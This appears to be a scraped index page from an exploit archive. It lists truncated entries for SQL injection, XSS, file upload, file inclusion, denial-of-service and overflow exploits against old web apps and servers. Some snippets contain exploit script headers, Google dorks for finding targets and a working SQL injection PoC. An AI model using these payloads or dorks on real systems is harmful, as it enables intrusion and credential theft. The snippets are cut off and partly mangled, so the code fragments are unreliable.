Pluck CMS 4.5.3 - update.php Remote File Corruption

Pluck CMS 4.5.3 - update.php Remote File Corruption "; copy"data/title.dat", "data/settings/title.dat"; unlink"data/settings/install.dat"; copy"data/install.dat", "data/settings/install.dat"; copy"data/options.php", "data/settings/options.php"; copy"data/pass.php", "data/settings/pass.php";...

The Personal FTP Server 6.0f - RETR Denial of Service

/ The Personal FTP Server 6.0f RETR DOS exploit A vulnerability exists in the way Personal FTP Server handles multiple RETR commands with overly long filenames.When confronted with such consecutive requests the server will crash. Usage : ./pftpdos ip port user password Ex. : ./pftpdos 127.0.0.1 2...

Easy Photo Gallery 2.1 - Cross-Site Scripting / File Disclosure/Bypass / SQL Injection

!/usr/bin/perl ---------------------------------------------------------------- Script : Ezphotogallery 2.1 Type : Multiple Vulnerabilities Xss/Login Bypass/Sql injection Exploit/File Disclosure Method : GET Alert : High Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="...

Gallery 2.0 - Multiple Cross-Site Scripting Vulnerabilities

Gallery 2.0 - Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/31060/info Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitra...

vastal-itechvisa.txt

Vastal I-Tech Visa Zone newsid SQL Injection Vulnerability Author : DeViL iRaQ Email : guitarlover46atyahoodotcom Price : $550.00 Script Home Page : http://www.vastal.com/visa-zone-a-specialised-script-made-just-for-law-firm-dealing-in-visa.html Demo : http://www.vastal.com/lawfirm/ Dork : N/A...

devalcms 1.4a XSS / Remote Code Execution Exploit

Exploit for unknown platform in category web applications ================================================= devalcms 1.4a XSS / Remote Code Execution Exploit ================================================= !/usr/bin/python devalcms v1.4a Remote Code Execution Exploit / Xss Discovered by : IRCRA...

friendly-readwrite.txt

Friendly Technologies - Read/Write Registry // Write to Registry FT.RegistryValue 1, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Key Name Here", 1 = "Input Here"; // Read from Registry var readreg = FT.RegistryValue 1, "SOFTWARE\Friendly Technologies\FriendlyWeb Dialer", "Version", 1;...

Sun Solaris 10 - snoop(1M) Utility Remote Command Execution

/ hoagiesnoop.c SUN SOLARIS SNOOP REMOTE EXPLOIT + Sun Solaris 8/9/10 + OpenSolaris /tmp/.patch.your.system.txt' now ... done attack:/exploits admin@opensolaris: snoop port 445 Using device pcn0 promiscuous mode sh1: ï¿œSMBr: not found No such file or directory WARNING: received signal 11 from...

geeklog-upload.txt

!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; print ; print "Enter File Pathpath to local file to upload: "; chompmy $file=; my $ua = LWP::UserAgent-new; my $re = $ua-requestPOST $url.'/fckeditor/editor/filemanager/upload/php/upload.php', ContentType =...

Microsoft Visual Studio - 'Msmask32.ocx' ActiveX Remote Buffer Overflow

Microsoft Visual Studio Msmask32.ocx ActiveX Remote Buffer Overflow Exploit Author: Koshi Original POC: http://www.milw0rm.com/exploits/6244 Not by me My first ActiveX exploit, learned quite a bit playing with this one. Heaps are handy. Loaded File: C:\WINDOWS\system32\MSMASK32.OCX Name: MSMask...

EasySite 2.3 Multiple Remote Vulnerabilities

No description provided by source. + EasySite v2.3 Multiple Remote Vulnerabilities + Discovered By SirGod + www.mortal-team.org + Greetz : E.M.I.N.E.M, Ras ,Puscasmarin ,ToxicBlood,MesSiAH,xZu,HrN + Local File Inclusion...

VidiScript (Avatar) Remote Arbitrary File Upload Vulnerability

No description provided by source. || || | || o,7 || . o7 || 4||| ow, : / / . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ \ | | \ \ /\ /\ \ \ \ /...

BBlog 0.7.6 - mod SQL Injection

BBlog 0.7.6 - mod SQL Injection BBlog 0.7.6 SQL Injection Vuln Vulnpath: /bblogplugins/builtin.help.php Vuln: if$GET'mod' $pluginrow = $bBlog-getrow"select from ".TPLUGINS." where name='".$GET'mod'."' and type='modifier'"; PoC: ?pid=1&mod='+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+bbauthors--...

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

No description provided by source. !/usr/bin/perl moziloCMS 1.10.1 Perl exploit discovered & written by Ams ax330d doggy gmail dot com DESCRIPTION: Vulnerability hides in "download.php", which we can use to download any file we want to. Here, for example, "admin/conf/logindata.conf". Btw, not ver...

ABG Blocking Script 1.0a (abg_path) Remote File Inclusion Vulnerability

No description provided by source. ================================================================= ========Africa Be Gone version 1.0a Remote File Inclusion======== ================================================================= Vendor: http://www.africabegone.com Download:...

phpx-cookie.txt

======================================================================= = gnix = gnixmail at gmail dot com http://gnix.netsons.org Application: phpx http://www.phpx.org/project.php stable version Versions: 3.5.16 Platforms: All Bug: Cookie poisoning / Login bypass Date: 31 July 2008...

Article Friendly ProStandard - SQL Injection

Article Friendly ProStandard - SQL Injection Viva IslaM Viva IslaM Remote SQL Injection Vulnerability Article Friendly Pro categorydetail.php Cat Article Friendly Standard authordetail.php autid http://www.articlefriendly.com/ AuTh0r : Mr.SQL H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM Email :...

e107 Plugin BLOG Engine 2.2 - Blind SQL Injection

e107 Plugin BLOG Engine 2.2 - Blind SQL Injection !/usr/bin/perl e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit ..::virangar security team::.. www.virangar.net C0d3d BY:virangar security team hadihadi special tnx to: MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra & all virangar members ...

e107 Plugin BLOG Engine 2.2 - Blind SQL Injection

!/usr/bin/perl e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit ..::virangar security team::.. www.virangar.net C0d3d BY:virangar security team hadihadi special tnx to: MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra & all virangar members & all hackerz my lovely friends hadiaryaie2004 &...

GNU Coreutils 'pam_succeed_if' PAM本地验证绕过漏洞

BUGTRAQ ID: 30363 CVE ID:CVE-2008-1946 CNCVE ID：CNCVE-20081946 GNU Coreutils是一款提供一整套基本的shell工具的软件包。 GNU Coreutils存在验证绕过问题，本地攻击者可以利用漏洞运行'su'命令来获得对锁住或过期帐户的访问。 配置文件中针对"su"命令没有正确的使用pamsucceedif PAM，如果目标帐户的密码被运行"su"命令的用户知道的情况下，可使用此命令更改锁住或过期用户帐户。 RedHat Enterprise Linux WS 4 RedHat Enterprise Linux ES ...